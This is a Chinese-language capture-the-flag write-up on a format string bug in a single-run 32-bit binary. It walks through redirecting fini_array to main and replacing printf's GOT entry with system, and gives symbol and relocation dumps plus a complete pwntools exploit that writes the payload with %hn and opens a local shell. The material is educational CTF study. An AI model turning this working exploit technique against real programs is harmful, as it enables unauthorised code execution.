Fmtstr_Loop

一阵风我拿起笔 一场雨我想起你
这一路的风和雨 仍然找不回自己

前言

很多时候都是因为程序中存在循环,如果程序中不存在循环呢？在一些栈溢出中我们可以使用ROP技术劫持函数返回地址到start，同样我们可以使用格式化字符串漏洞做到这一点….

实例

题目:链接

思路

虽然我们写代码的时候以main函数作为程序入口，但是编译成程序的时候入口并不是main函数,而是start代码段。事实上,start代码段还会调用__libc_start_main来做一些初始化工作,最后调用main函数并在main函数结束后做一些处理;
所以我们可以修改fini段来修改程序的执行流程….

这道题就是一个标准的格式化字符串漏洞,并且程序只可以执行一次:

sir@sir-PC:~/desktop/2$ ./pwn
Welcome to my ctf! What's your name?
aaaa,%x,%x,%x,%x,%x
Hello aaaa,ff82d830,2,0,61616161,252c7825

这道题我们的思路就是修改fini段,让程序可以执行多次,然后把printf_got的位置换为system_plt,当程序执行printf(“/bin/sh;”)就去执行system(“/bin/sh;”)了;

找要修改的fini的位置:

sir@sir-PC:~/desktop/2$ nm pwn | grep fini
0804979c t __do_global_dtors_aux_fini_array_entry
08048624 T _fini
08048620 T __libc_csu_fini

我们只要把0x0804979c这个位置的内容改为main函数的地址,程序在结束的时候就会执行main函数了;

sir@sir-PC:~/desktop/2$ nm pwn | grep main
         U __libc_start_main@@GLIBC_2.0
08048534 T main

sir@sir-PC:~/desktop/2$ objdump -R pwn

pwn：     文件格式 elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
0804988c R_386_GLOB_DAT    __gmon_start__
080498c0 R_386_COPY        stdin@@GLIBC_2.0
080498c4 R_386_COPY        stdout@@GLIBC_2.0
0804989c R_386_JUMP_SLOT   printf@GLIBC_2.0
080498a0 R_386_JUMP_SLOT   puts@GLIBC_2.0
080498a4 R_386_JUMP_SLOT   system@GLIBC_2.0
080498a8 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
080498ac R_386_JUMP_SLOT   setvbuf@GLIBC_2.0
080498b0 R_386_JUMP_SLOT   __isoc99_scanf@GLIBC_2.7

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './2/pwn'
p = process(name)

if args.G:
    gdb.attach(p)

main_addr = 0x8048534
fini_addr = 0x804979c
system_plt_addr = 0x80483d0
printf_got_addr = 0x804989c
# 第一次执行程序
p.recvuntil("Welcome to my ctf! What's your name?\n")
pay = p32(0x804979c) + p32(0x804979c+2)  + p32(0x804989c) + p32(0x804989c+2) + '%34084c%4$hn' + '%33488c%5$hn' + '%31692c%6$hn' + '%33844c%7$hn'
p.sendline(pay)
# 第二次执行程序
p.recvuntil("Welcome to my ctf! What's your name?\n")
p.sendline('/bin/sh;')
p.interactive()